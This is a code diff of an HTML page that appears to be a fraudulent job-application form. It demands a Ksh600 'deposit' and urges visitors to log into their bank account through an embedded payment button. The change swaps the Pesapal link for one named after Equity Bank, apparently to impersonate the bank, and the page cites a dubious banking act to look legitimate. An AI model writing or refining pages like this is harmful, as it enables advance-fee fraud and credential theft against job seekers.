--- a/index5.html
+++ b/index5.html
@@ -22,7 +22,7 @@
    </div>
    <div><label>-Furthermore we require a minimum deposit Ksh600 to process the form submitted. Your required to follow these steps to complete submission.</label></div>
     <h4>*For security reasons it is recommended to login into your bank account with button below and your financial status will be processed automatically to ensure security of credentials and information*</u></h4>
-    <iframe width="200" height="40" src="https://store.pesapal.com/embed-code?pageUrl=https://store.pesapal.com/jobapplicationkenya" frameborder="0" allowfullscreen></iframe>
+    <iframe width="200" height="40" src="https://store.pesapal.com/embed-code?pageUrl=https://store.pesapal.com/equitybankjobapplicationke" frameborder="0" allowfullscreen></iframe>
     <div class="line"><label>_______________________________________________________</label></div>
    <div class="act"><h6>According to the Banking Act(a) of 2017 we are not eligible to perform any financial processes on your behalf.</h6></div>
     <div class="line3"><label>_______________________________________________________</label></div>
